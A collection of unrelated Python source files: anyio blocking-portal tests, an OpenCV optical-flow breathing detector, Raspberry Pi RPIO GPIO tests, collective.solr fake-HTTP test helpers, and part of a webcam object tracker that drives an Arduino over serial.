await run_sync_in_worker_thread(thread1.join)
await run_sync_in_worker_thread(thread2.join)
assert len(results) == 2
assert isinstance(results[0], CancelledError)
assert isinstance(results[1], CancelledError)
async def test_aexit_without_exception(self):
"""Test that when the portal exits, it waits for all tasks to finish."""
def external_thread():
try:
portal.call(sleep, 0.2)
except BaseException as exc:
results.append(exc)
else:
results.append(None)
results = []
async with create_blocking_portal() as portal:
thread1 = threading.Thread(target=external_thread)
thread1.start()
thread2 = threading.Thread(target=external_thread)
thread2.start()
await sleep(0.1)
assert not results
await run_sync_in_worker_thread(thread1.join)
await run_sync_in_worker_thread(thread2.join)
assert results == [None, None]
async def test_call_portal_from_event_loop_thread(self):
async with create_blocking_portal() as portal:
exc = pytest.raises(RuntimeError, portal.call, threading.get_ident)
exc.match('This method cannot be called from the event loop thread')
@pytest.mark.parametrize('use_contextmanager', [False, True],
ids=['contextmanager', 'startstop'])
def test_start_with_new_event_loop(self, anyio_backend_name, anyio_backend_options,
use_contextmanager):
async def async_get_thread_id():
return threading.get_ident()
if use_contextmanager:
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
thread_id = portal.call(async_get_thread_id)
else:
portal = start_blocking_portal(anyio_backend_name, anyio_backend_options)
try:
thread_id = portal.call(async_get_thread_id)
finally:
portal.call(portal.stop)
assert isinstance(thread_id, int)
assert thread_id != threading.get_ident()
def test_call_stopped_portal(self, anyio_backend_name, anyio_backend_options):
portal = start_blocking_portal(anyio_backend_name, anyio_backend_options)
portal.call(portal.stop)
pytest.raises(RuntimeError, portal.call, threading.get_ident).\
match('This portal is not running')
|
OF_circle.py
|
import cv2
from tkinter import Tk
from tkinter.filedialog import askopenfilename
import numpy as np
import imutils
import math
import threading
def main():
cap = cv2.VideoCapture(vid_path)
status1, previous_frame = cap.read()
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
copy_frame = cv2.cvtColor(previous_frame, cv2.COLOR_BGR2GRAY)
hsv = np.zeros_like(previous_frame)
hsv[...,1] = 255
t = 20
dc = 6
red = 30
check_red = 1
start = 0
radiuce_up_limit = 60
radiuce_low_limit = 30
i = 0
while(i < total_frames - 1):
ret, frame = cap.read()
i = i + 1
frame1 = frame.copy()
current_frame = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
current_frame = cv2.GaussianBlur(current_frame, (var_blur,var_blur), 0)
# optical Flow
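# Farneback dense optical flow between the reference frame and the current
# frame; parameters: pyr_scale=0.5, levels=3, winsize=15, iterations=3,
# poly_n=5, poly_sigma=1.2, flags=0.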
flow = cv2.calcOpticalFlowFarneback(copy_frame,current_frame, None, 0.5, 3, 15, 3, 5, 1.2, 0)
mag, ang = cv2.cartToPolar(flow[...,0], flow[...,1])
hsv[...,0] = ang*180/np.pi/2
hsv[...,2] = cv2.normalize(mag,None,0,255,cv2.NORM_MINMAX)
bgr = cv2.cvtColor(hsv,cv2.COLOR_HSV2BGR)
grayscaled = cv2.cvtColor(bgr,cv2.COLOR_BGR2GRAY)
retval2 , binary_image2 = cv2.threshold(grayscaled,125,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
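# With cv2.THRESH_OTSU the fixed threshold value (125) is ignored; Otsu's
# method picks the threshold automatically and returns it in retval2.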
lab_val = 255
n_labels, img_labeled, lab_stats, _ = \
cv2.connectedComponentsWithStats(binary_image2, connectivity=8,
ltype=cv2.CV_32S)
if check_red == 1:
red = red + 10
if red > radiuce_up_limit:
check_red = 0
else:
red = red - 10
if red == radiuce_low_limit:
check_red = 1
if lab_stats[1:, 4].size > 2:
start = 1
dc = dc +1
if dc > 6:
dc = 0
re = lab_stats[1:, 4].argsort()[-3:][::-1] + 1
largest_mask = np.zeros(binary_image2.shape, dtype=np.uint8)
largest_mask[img_labeled == re[0]] = lab_val
cnts1 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts1 = cnts1[0] if imutils.is_cv2() else cnts1[1]
X1 = cnts1[0][0]
cX1 = X1[0][0]
cY1 = X1[0][1]
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
t = t+1
if t > 40:
if lab_stats[1:, 4].size > 0 and start == 1:
t = 0
cv2.putText(frame,'Not Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,0,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
copy_frame = current_frame  # advance the reference frame used by the optical-flow step
k = cv2.waitKey(1) & 0xff
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
Tk().withdraw()
vid_path = askopenfilename(filetypes =(("Video File", "*.mp4"),("Video File","*.avi"),("Video File", "*.flv"),("All Files","*.*")),
title = "Choose a video.")
no_of_threads = 1
var_blur = 3
thred = []
jobs = []
for i in range(0, no_of_threads):
thred = threading.Thread(target=main)
jobs.append(thred)
for j in jobs:
j.start()
for j in jobs:
j.join()
|
tests_gpio.py
|
#!/usr/bin/env python
#
# This file is part of RPIO.
#
# Copyright
#
# Copyright (C) 2013 Chris Hager <chris@linuxuser.at>
#
# License
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details at
# <http://www.gnu.org/licenses/lgpl-3.0-standalone.html>
#
# Documentation
#
# http://pythonhosted.org/RPIO
#
"""
This test suite runs on the Raspberry Pi and tests RPIO inside out.
"""
import os
import sys
import time
import unittest
import socket
from threading import Thread
import logging
log_format = '%(levelname)s | %(asctime)-15s | %(message)s'
logging.basicConfig(format=log_format, level=logging.DEBUG)
import RPIO
RPIO.setwarnings(False)
GPIO_IN = 14
GPIO_OUT = 17
def run(cmd):
logging.info("Running `%s`...", cmd)
os.system(cmd)
class TestSequenceFunctions(unittest.TestCase):
def test1_version(self):
logging.info("Version: %s (%s)", RPIO.VERSION, RPIO.VERSION_GPIO)
def test2_rpio_cmd(self):
logging.info(" ")
cmd = "sudo python rpio" if sys.version_info[0] == 2 else \
"sudo python3 rpio"
logging.info("=== rpio COMMAND LINE TOOL TESTS (`%s`)===", cmd)
run("%s --version" % cmd)
run("%s -v -I" % cmd)
run("%s -v -i 5,%s,%s" % (cmd, GPIO_IN, GPIO_OUT))
# run("sudo python rpio --update-man")
run("%s --sysinfo" % cmd)
def test3_input(self):
logging.info(" ")
logging.info(" ")
logging.info("=== INPUT TESTS ===")
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
RPIO.setup(5, RPIO.IN)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
RPIO.setup(0, RPIO.IN)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
RPIO.setup(32, RPIO.IN)
RPIO.setup(GPIO_IN, RPIO.IN)
logging.info(" ")
logging.info("--------------------------------------")
logging.info("Input from GPIO-%s w/ PULLOFF: %s", \
GPIO_IN, RPIO.input(GPIO_IN))
RPIO.set_pullupdn(GPIO_IN, RPIO.PUD_UP)
logging.info("Input from GPIO-%s w/ PULLUP: %s", \
GPIO_IN, RPIO.input(GPIO_IN))
RPIO.set_pullupdn(GPIO_IN, RPIO.PUD_DOWN)
logging.info("Input from GPIO-%s w/ PULLDOWN: %s", \
GPIO_IN, RPIO.input(GPIO_IN))
logging.info("--------------------------------------")
logging.info(" ")
RPIO.set_pullupdn(GPIO_IN, RPIO.PUD_OFF)
def test4_output(self):
logging.info(" ")
logging.info(" ")
logging.info("=== OUTPUT TESTS ===")
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
# 5 is not a valid gpio
RPIO.setup(5, RPIO.OUT)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
# 0 is not a valid gpio
RPIO.setup(0, RPIO.OUT)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
# 32 is not a valid gpio
RPIO.setup(32, RPIO.OUT)
logging.info("Setting up GPIO-%s as output...", GPIO_OUT)
RPIO.setup(GPIO_OUT, RPIO.OUT, initial=RPIO.LOW)
RPIO.setup(GPIO_OUT, RPIO.OUT)
logging.info("Setting GPIO-%s output to 1...", GPIO_OUT)
RPIO.output(GPIO_OUT, RPIO.HIGH)
time.sleep(2)
logging.info("Setting GPIO-%s output to 0...", GPIO_OUT)
RPIO.output(GPIO_OUT, RPIO.LOW)
def test5_board_pin_numbers(self):
logging.info(" ")
logging.info(" ")
logging.info("=== BCM AND BOARD NUMBERING TESTS ===")
RPIO.setmode(RPIO.BCM)
if RPIO.sysinfo()[1] == 'B+':
pins = RPIO.GPIO_LIST_R3
elif RPIO.RPI_REVISION == 1:
pins = RPIO.GPIO_LIST_R1
else:
pins = RPIO.GPIO_LIST_R2
logging.info("testing bcm gpio numbering: %s", pins)
for pin in pins:
gpio_id = RPIO.channel_to_gpio(pin)
logging.info("- BCM channel %s = gpio %s", pin, gpio_id)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
gpio_id = RPIO.channel_to_gpio(32)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
gpio_id = RPIO.channel_to_gpio(5)
logging.info(" ")
pins = RPIO.PIN_LIST
RPIO.setmode(RPIO.BOARD)
logging.info("testing board gpio numbering: %s", pins)
for pin in pins:
if pin >> 8 > 0:
# py_gpio.c cannot deal with BOARD->BCM of P5 pins yet
continue
gpio_id = RPIO.channel_to_gpio(pin)
logging.info("- BOARD channel %s = gpio %s", pin, gpio_id)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
gpio_id = RPIO.channel_to_gpio(0)
RPIO.setmode(RPIO.BCM)
def test6_interrupts(self):
logging.info(" ")
logging.info(" ")
logging.info("=== INTERRUPT TESTS ==")
def test_callback(*args):
logging.info("- interrupt callback received: %s", (args))
def stop_interrupts(timeout=3):
time.sleep(timeout)
RPIO.stop_waiting_for_interrupts()
logging.info("- called `stop_waiting_for_interrupts()`")
PORT = 8080
def socket_callback(socket, msg):
logging.info("Socket [%s] msg received: %s", socket.fileno(), msg)
def socket_client(timeout=3):
logging.info("Socket client connecting in 3 seconds...")
time.sleep(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", PORT))
s.sendall("Hello, world".encode('utf-8'))
s.close()
logging.info("Socket client done...")
#
# Interrupt test with socket comm
#
logging.info(" ")
logging.info("Testing interrupts on GPIO-%s and socket comm", GPIO_IN)
RPIO.add_tcp_callback(PORT, socket_callback)
with self.assertRaises(AttributeError):
RPIO.add_tcp_callback(8081, None)
RPIO.add_interrupt_callback(GPIO_IN, test_callback, edge='both', \
pull_up_down=RPIO.PUD_DOWN)
RPIO.add_interrupt_callback(GPIO_IN, test_callback, edge='both', \
pull_up_down=RPIO.PUD_DOWN, threaded_callback=True)
# Add a number of TCP clients
Thread(target=socket_client).start()
Thread(target=socket_client, args=(4,)).start()
Thread(target=socket_client, args=(4,)).start()
Thread(target=socket_client, args=(4,)).start()
Thread(target=socket_client, args=(4,)).start()
# One stop interrupts thread
Thread(target=stop_interrupts, args=(10,)).start()
logging.info("- waiting 10s for interrupts on GPIO-%s...", GPIO_IN)
RPIO.wait_for_interrupts()
logging.info("-")
RPIO.cleanup()
#
# Auto interrupt shutdown with thread and stop_waiting_for_interrupts
#
logging.info("start second ")
RPIO.add_interrupt_callback(GPIO_IN, test_callback, edge='both', \
pull_up_down=RPIO.PUD_OFF)
RPIO.add_interrupt_callback(GPIO_OUT, test_callback, edge='falling', \
pull_up_down=RPIO.PUD_UP, debounce_timeout_ms=100)
logging.info("- waiting 3s for interrupts on gpio %s and %s...", \
GPIO_IN, GPIO_OUT)
Thread(target=stop_interrupts, args=(3,)).start()
RPIO.wait_for_interrupts()
logging.info("-")
RPIO.cleanup()
logging.info("ALL DONE :)")
if __name__ == '__main__':
logging.info("==================================")
logging.info("= Test Suite Run with Python %s =" % \
sys.version_info[0])
logging.info("==================================")
logging.info("")
logging.info("")
unittest.main()
|
utils.py
|
from os.path import dirname, join
from httplib import HTTPConnection
from threading import Thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from StringIO import StringIO
from socket import error
from sys import stderr
from re import search
from collective.solr.local import getLocal, setLocal
from collective.solr import tests
try:
from zope.component.hooks import getSite, setSite
except ImportError:
from zope.app.component.hooks import getSite, setSite
try:
from Zope2.App import zcml
except ImportError:
from Products.Five import zcml
def loadZCMLString(string):
# Unset current site for Zope 2.13
saved = getSite()
setSite(None)
try:
zcml.load_string(string)
finally:
setSite(saved)
def getData(filename):
""" return a file object from the test data folder """
filename = join(dirname(tests.__file__), 'data', filename)
return open(filename, 'r').read()
def fakehttp(solrconn, *fakedata):
""" helper function to set up a fake http request on a SolrConnection """
class FakeOutput(list):
""" helper class to organize output from fake connections """
conn = solrconn
def log(self, item):
self.current.append(item)
def get(self, skip=0):
self[:] = self[skip:]
return ''.join(self.pop(0)).replace('\r', '')
def new(self):
self.current = []
self.append(self.current)
def __len__(self):
self.conn.flush() # send out all pending xml
return super(FakeOutput, self).__len__()
def __str__(self):
self.conn.flush() # send out all pending xml
if self:
return ''.join(self[0]).replace('\r', '')
else:
return ''
output = FakeOutput()
class FakeSocket(StringIO):
""" helper class to fake socket communication """
def sendall(self, str):
output.log(str)
def makefile(self, mode, name):
return self
def read(self, amt=None):
if self.closed:
return ''
return StringIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return ''
return StringIO.readline(self, length)
class FakeHTTPConnection(HTTPConnection):
""" helper class to fake a http connection object from httplib.py """
def __init__(self, host, *fakedata):
HTTPConnection.__init__(self, host)
self.fakedata = list(fakedata)
def putrequest(self, *args, **kw):
response = self.fakedata.pop(0) # get first response
self.sock = FakeSocket(response) # and set up a fake socket
output.new() # as well as an output buffer
HTTPConnection.putrequest(self, *args, **kw)
def setTimeout(self, timeout):
pass
solrconn.conn = FakeHTTPConnection(solrconn.conn.host, *fakedata)
return output
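# Illustrative usage of fakehttp (names below are examples, not part of this module):
#   output = fakehttp(solrconn, getData('add_response.txt'))
#   solrconn.add(id='foo')        # request goes to the fake socket, not a real Solr
#   sent_xml = str(output)        # inspect the XML that would have been posted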
def fakemore(solrconn, *fakedata):
""" helper function to add more fake http requests to a SolrConnection """
assert hasattr(solrconn.conn, 'fakedata') # `isinstance()` doesn't work?
solrconn.conn.fakedata.extend(fakedata)
def fakeServer(actions, port=55555):
""" helper to set up and activate a fake http server used for testing
purposes; <actions> must be a list of handler functions, which will
receive the base handler as their only argument and are used to
process the incoming requests in turn; returns a thread that should
be 'joined' when done """
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
action = actions.pop(0) # get next action
action(self) # and process it...
def do_GET(self):
action = actions.pop(0) # get next action
action(self) # and process it...
def log_request(*args, **kw):
pass
def runner():
while actions:
server.handle_request()
server = HTTPServer(('', port), Handler)
thread = Thread(target=runner)
thread.start()
return thread
def pingSolr():
""" test if the solr server is available """
status = getLocal('solrStatus')
if status is not None:
return status
conn = HTTPConnection('localhost', 8983)
try:
conn.request('GET', '/solr/admin/ping')
response = conn.getresponse()
status = response.status == 200
msg = "INFO: solr return status '%s'" % response.status
except error, e:
status = False
msg = 'WARNING: solr tests could not be run: "%s".' % e
if not status:
print >> stderr
print >> stderr, '*' * len(msg)
print >> stderr, msg
print >> stderr, '*' * len(msg)
print >> stderr
setLocal('solrStatus', status)
return status
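# numFound() extracts the hit count from a Solr XML response string, e.g.
# numFound('<result numFound="42">') returns 42 (illustrative input).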
def numFound(result):
match = search(r'numFound="(\d+)"', result)
if match is not None:
match = int(match.group(1))
return match
|
Shooter_CameraTracker.py
|
import sys
import os
import time
import numpy as np
import serial ### pip install pyserial
import struct
import logging
# import dlib
import copy
from imutils.video import VideoStream
from imutils.video import FPS
import argparse
import imutils
import time
# Threads
# from thread import start_new_thread
from threading import Lock
import threading
# from matplotlib import pyplot as plt
# from ovrsdk import * ### pip install python-ovrsdk
# from Quaternion import Quat
import binascii
import cv2 #### DO NOT: pip install opencv-python; DO: sudo apt-get install python-opencv
# import face_recognition # https://github.com/ageitgey/face_recognition
NUMOFSCREENS = 2
MAX_FACES = 10
serialExist = True
wanted_dir = "./examples/wanted/"
boring_dir = "./examples/boring/"
camera_L = 1
camera_R = 0
ArduinoCOM = '/dev/ttyACM0'
factor_LR = 0.6
factor_UD = 0.1
factor_line = 0.2
DRAW_RIGHT_EYE = True
cy_sub = 540
cx_sub = 960
dx_sub = 150
dy_sub = 100
tmp_dy_sub = 80
tmp_dx_sub = 0
left_camera_image = -1
right_camera_image = -1
face_locations_global = []
face_names_global = []
face_interest_global = []
face_landmarks_list_global = []
wanted_list_global = []
tracking_frame_global = []
wanted_sz = 100
grab_data = True
track_data = False
dx = 0
dy = 0
frame_lock = Lock()
cap = cv2.VideoCapture(0)
key = 0
dec = 0
ra = 0
killFlag = False
lock = threading.Lock()
fov_h = 61 # DEG
fov_v = 34.4
error_in_deg_v = 0
error_in_deg_h = 0
mouseX = mouseY = 0
update_tracker = False
lk_params = dict(winSize = (15, 15),
maxLevel = 4,
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
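# Lucas-Kanade pyramidal optical-flow parameters: 15x15 search window, up to 4
# pyramid levels, and termination after 10 iterations or an update below 0.03.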
minimun_pts_track = 10
tarcking_window_height = 10
tracking_window_width = 10
bias_h = 0
bias_v = 0
p_bias_h = 0
p_bias_v = 0
e_h = 0
e_v = 0
p_e_h = 0
p_e_v = 0
track_center = np.zeros(2)
def draw_circle(event, x, y, flags, param):
global gray
global mouseX, mouseY
global error_in_deg_v, error_in_deg_h
global update_tracker
global start_tracking,track_x,track_y, bias_h,bias_v , width , height , p_bias_h ,p_bias_v,track_center,e_h,e_v , p_e_h , p_e_v
if event == cv2.EVENT_LBUTTONDBLCLK:
update_tracker = True
mouseX, mouseY = x, y
start_tracking = True
track_x = x
track_y = y
p_bias_h = bias_h
p_bias_v = bias_v
p_e_h = e_h
p_e_v = e_v
bias_h += width / 2 - x
bias_v += height / 2 - y
if track_center[0]:
e_h = width / 2 - track_center[0]
e_v = height / 2 - track_center[1]
print(p_e_h,p_e_v,p_bias_h,p_bias_v,bias_h,bias_v,x, y)
def camera_thread_better():
global key, ra, dec, killFlag, error_in_deg_h, error_in_deg_v
global gray
global mouseX, mouseY
global update_tracker
global start_tracking,track_x,track_y , bias_h,bias_v , width , height, p_bias_h ,p_bias_v,track_center , p_e_h , p_e_v
start_tracking = False
is_tracking = False
track_x, track_y = (0, 0)
tracking_corners = None
lk_params = dict(winSize=(15, 15),
maxLevel=4,
criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
minimun_pts_track = 10
cam = cv2.VideoCapture(0)
cv2.namedWindow('viewer', cv2.WINDOW_NORMAL)
cv2.setMouseCallback("viewer", draw_circle)
old_gray = None
while True:
ret, frame = cam.read()
if ret:
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
height, width = gray.shape
if is_tracking:
new_points, status, error = cv2.calcOpticalFlowPyrLK(old_gray, gray, tracking_corners, None,
**lk_params)
tracking_corners = new_points
if tracking_corners.shape[0] < minimun_pts_track:
for i in range(-5, 5):
for j in range(-5, 5):
tracking_corners.append([track_x + i, track_y + j])
tracking_corners = np.array(tracking_corners).reshape(len(tracking_corners), 1, 2).astype('float32')
track_center = tracking_corners[:, 0, :].mean(axis=0).astype('int32')
#print(track_center)
# x, y = new_points.ravel()
cv2.circle(frame, (track_center[0], track_center[1]), 5, (0, 255, 0), -1)
#x = track_center[0]
#y = track_center[1]
pix_to_deg_v = height / fov_v
pix_to_deg_h = width / fov_h
error_x = (width / 2 + p_bias_h - p_e_h) - track_center[0]
error_y = (height / 2 + p_bias_v - p_e_v) - track_center[1]
error_in_deg_v = error_y / pix_to_deg_v
error_in_deg_h = error_x / pix_to_deg_h
#print(error_x,error_y)
if start_tracking:
tracking_corners = []
for i in range(-5, 5):
for j in range(-5, 5):
tracking_corners.append([track_x + i, track_y + j])
tracking_corners = np.array(tracking_corners).reshape(len(tracking_corners), 1, 2).astype('float32')
# print(tracking_corners)
start_tracking = False
is_tracking = True
cv2.line(frame, (width // 2, height // 2 - 10), (width // 2, height // 2 + 10), (0, 255, 0), 3)
cv2.line(frame, (width // 2 - 10, height // 2), (width // 2 + 10, height // 2), (0, 255, 0), 3)
old_gray = gray.copy()
cv2.imshow("viewer", frame)
cv2.waitKey(1)
def camera_thread():
global key, ra, dec, killFlag, error_in_deg_h, error_in_deg_v
global gray
global mouseX, mouseY
global update_tracker
dx = dy = 25
# mouseX, mouseY = -1, -1
# cap = cv2.VideoCapture(0)
#
# ret, frame = cap.read()
# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# cv2.namedWindow('frame')
# cv2.imshow('frame', gray)
# cv2.setMouseCallback('frame', draw_circle)
# while (True):
# # Capture frame-by-frame
# ret, frame = cap.read()
#
# # Our operations on the frame come here
# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# height, width = gray.shape
#
# pix_to_deg_v = height / fov_v
# pix_to_deg_h = width / fov_h
#
# # Display the resulting frame
# cv2.line(gray, (width / 4, height / 4 - 10), (width / 4, height / 4 + 10), (0, 255, 0), 3)
# cv2.line(gray, (width / 4 - 10, height / 4), (width / 4 + 10, height / 4), (0, 255, 0), 3)
#
# cv2.line(gray, (3 * width / 4, 3 * height / 4 - 10), (3 * width / 4, 3 * height / 4 + 10), (0, 255, 0), 3)
# cv2.line(gray, (3 * width / 4 - 10, 3 * height / 4), (3 * width / 4 + 10, 3 * height / 4), (0, 255, 0), 3)
#
# cv2.line(gray, (width / 4, 3 * height / 4 - 10), (width / 4, 3 * height / 4 + 10), (0, 255, 0), 3)
# cv2.line(gray, (width / 4 - 10, 3 * height / 4), (width / 4 + 10, 3 * height / 4), (0, 255, 0), 3)
#
# cv2.line(gray, (3 * width / 4, height / 4 - 10), (3 * width / 4, height / 4 + 10), (0, 255, 0), 3)
# cv2.line(gray, (3 * width / 4 - 10, height / 4), (3 * width / 4 + 10, height / 4), (0, 255, 0), 3)
#
# if mouseX > -1 and mouseY > -1:
# cv2.circle(gray, (mouseX, mouseY), 10, (0, 0, 0), thickness=3, lineType=8, shift=0)
#
# cv2.circle(gray, (width / 2, height / 2), 10, (22, 222, 22), thickness=3, lineType=8, shift=0)
#
# error_x = width / 2 - mouseX
# error_y = height / 2 - mouseY
#
# error_in_deg_v = error_y / pix_to_deg_v
# error_in_deg_h = error_x / pix_to_deg_h
#
# print (error_in_deg_h, error_in_deg_v)
# cv2.imshow('frame', gray)
#
# # print(cv2.waitKey(1))
#
# temp = 0
# lock.acquire()
# try:
# temp = ra
# finally:
# lock.release()
#
# key = cv2.waitKey(1)
# if key & 0xFF == ord('q'):
# print("breaking")
# break
# if key & 0xFF == ord('w'):
# temp = temp + 5
# print("ra(temp): {}".format(temp))
# if key & 0xFF == ord('s'):
# temp = temp - 5
# print("ra(temp): {}".format(temp))
#
# lock.acquire()
# try:
# ra = temp
# finally:
# lock.release()
#
# # When everything done, release the capture
# cap.release()
# cv2.destroyAllWindows()
# otherwise, for OpenCV 3.3 OR NEWER, we need to explicity call the
# initialize a dictionary that maps strings to their corresponding
# OpenCV object tracker implementations
OPENCV_OBJECT_TRACKERS = {
# "csrt": cv2.TrackerCSRT_create,
"kcf": cv2.TrackerKCF_create,
"boosting": cv2.TrackerBoosting_create,
"mil": cv2.TrackerMIL_create,
"tld": cv2.TrackerTLD_create,
"medianflow": cv2.TrackerMedianFlow_create,
# "mosse": cv2.TrackerMOSSE_create
}
# grab the appropriate object tracker using our dictionary of
# OpenCV object tracker objects
# tracker = OPENCV_OBJECT_TRACKERS[args["tracker"]]()
tracker = OPENCV_OBJECT_TRACKERS['medianflow']()
# initialize the bounding box coordinates of the object we are going
# to track
initBB = None
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
time.sleep(1.0)
# initialize the FPS throughput estimator
fps = None
# loop over frames from the video stream
while True:
# grab the current frame, then handle if we are using a
# VideoStream or VideoCapture object
frame = vs.read()
# check to see if we have reached the end of the stream
if frame is None:
break
# Our operations on the frame come here
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
height, width = gray.shape
# resize the frame (so we can process it faster) and grab the
# frame dimensions
# frame = imutils.resize(frame, width=500)
(H, W) = frame.shape[:2]
# check to see if we are currently tracking an object
if initBB is not None:
# grab the new bounding box coordinates of the object
(success, box) = tracker.update(frame)
# check to see if the tracking was a success
if success:
(x, y, w, h) = [int(v) for v in box]
cv2.rectangle(frame, (x, y), (x + dx, y + dy),
(0, 255, 0), 2)
error_x = width / 2 - x
error_y = height / 2 - y
error_in_deg_v = error_y / (height / fov_v)
error_in_deg_h = error_x / (width / fov_h)
# print (error_in_deg_h, error_in_deg_v)
# update the FPS counter
fps.update()
fps.stop()
# initialize the set of information we'll be displaying on
# the frame
info = [
("Tracker", 'medianflow'),
("Success", "Yes" if success else "No"),
("FPS", "{:.2f}".format(fps.fps())),
]
# loop over the info tuples and draw them on our frame
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(frame, text, (10, H - ((i * 20) + 20)),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
# check to see if we are currently tracking an object
pix_to_deg_v = height / fov_v
pix_to_deg_h = width / fov_h
# Display the resulting frame
cv2.line(gray, (width // 4, height // 4 - 10), (width // 4, height // 4 + 10), (0, 255, 0), 3)
cv2.line(gray, (width // 4 - 10, height // 4), (width // 4 + 10, height // 4), (0, 255, 0), 3)
cv2.line(gray, (3 * width // 4, 3 * height // 4 - 10), (3 * width // 4, 3 * height // 4 + 10), (0, 255, 0), 3)
cv2.line(gray, (3 * width // 4 - 10, 3 * height // 4), (3 * width // 4 + 10, 3 * height // 4), (0, 255, 0), 3)
cv2.line(gray, (width // 4, 3 * height // 4 - 10), (width // 4, 3 * height // 4 + 10), (0, 255, 0), 3)
cv2.line(gray, (width // 4 - 10, 3 * height // 4), (width // 4 + 10, 3 * height // 4), (0, 255, 0), 3)
cv2.line(gray, (3 * width // 4, height // 4 - 10), (3 * width // 4, height // 4 + 10), (0, 255, 0), 3)
cv2.line(gray, (3 * width // 4 - 10, height // 4), (3 * width // 4 + 10, height // 4), (0, 255, 0), 3)
if update_tracker and mouseX > -1 and mouseY > -1:
update_tracker = False
#frame = vs.read()
cv2.circle(frame, (mouseX, mouseY), 10, (0, 0, 0), thickness=3, lineType=8, shift=0)
cv2.rectangle(frame, (mouseX - dx, mouseY - dy), (mouseX + dx, mouseY + dy), (0, 0, 255), 2)
initBB = (mouseX - dx, mouseY - dy, 2 * dx, 2 * dy)  # tracker.init expects an (x, y, w, h) box
# print (initBB)
tracker = OPENCV_OBJECT_TRACKERS['medianflow']()
tracker.init(frame, initBB)
fps = FPS().start()
cv2.circle(frame, (width // 2, height // 2), 10, (22, 222, 22), thickness=3, lineType=8, shift=0)
# error_x = width / 2 - mouseX
# error_y = height / 2 - mouseY
# error_in_deg_v = error_y / pix_to_deg_v
# error_in_deg_h = error_x / pix_to_deg_h
# print (error_in_deg_h, error_in_deg_v)
# show the output frame
cv2.imshow("Frame", frame)
cv2.setMouseCallback("Frame", draw_circle)
key = cv2.waitKey(1) & 0xFF
# if the 's' key is selected, we are going to "select" a bounding
# box to track
if key == ord("s"):
# select the bounding box of the object we want to track (make
# sure you press ENTER or SPACE after selecting the ROI)
initBB = cv2.selectROI("Frame", frame, fromCenter=False,
showCrosshair=True)
# print (initBB)
# start OpenCV object tracker using the supplied bounding box
# coordinates, then start the FPS throughput estimator as well
tracker.init(frame, initBB)
fps = FPS().start()
# if the `q` key was pressed, break from the loop
elif key == ord("q"):
break
# if we are using a webcam, release the pointer
vs.stop()
# # otherwise, release the file pointer
# else:
# vs.release()
# close all windows
cv2.destroyAllWindows()
killFlag = True
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
def oculus_handle():
global key, ra, dec, error_in_deg_h, error_in_deg_v
yaw_lastStep = 0
pitch_lastStep = 0
roll_lastStep = 0
yaw_steps = 0
pitch_steps = 0
bufferLength = 2
yawVec = np.zeros(bufferLength)
pitchVec = np.zeros(bufferLength) + 127
raiseFlag = True
local_ra = 0
while killFlag is False:
# ss = ovrHmd_GetSensorState(hmd, ovr_GetTimeInSeconds())
# pose = ss.Predicted.Pose
# q = Quat([pose.Orientation.w, pose.Orientation.x, pose.Orientation.y,
# pose.Orientation.z]) # q.ra --> Pitch , q.dec --> Yaw , q.roll --> Roll
# print q.ra, q.dec, q.roll
# this part is true only for "pitch" of -90 to 90 degrees (The half dome infront of a person )
#tic = time.time()
lock.acquire()
dec = error_in_deg_h * 1.0
if dec > 45:
decLim = 45.0
raiseFlag = False
elif dec < -45:
raiseFlag = True
decLim = -45.0
else:
decLim = dec
steps_per_rev = 127
yaw_newStep = ((decLim / 180) * steps_per_rev)
yaw_lastStep = yaw_steps
yaw_steps = int(round(yaw_newStep))
yawVec[:-1]=yawVec[1:]
yawVec[-1] = yaw_steps
yaw_steps = np.mean(yawVec)
# lock.acquire()
try:
#error_in_deg_h = error_in_deg_h % 360
# local_ra = ra = error_in_deg_h*1.0
local_ra = ra = error_in_deg_v * 1.0
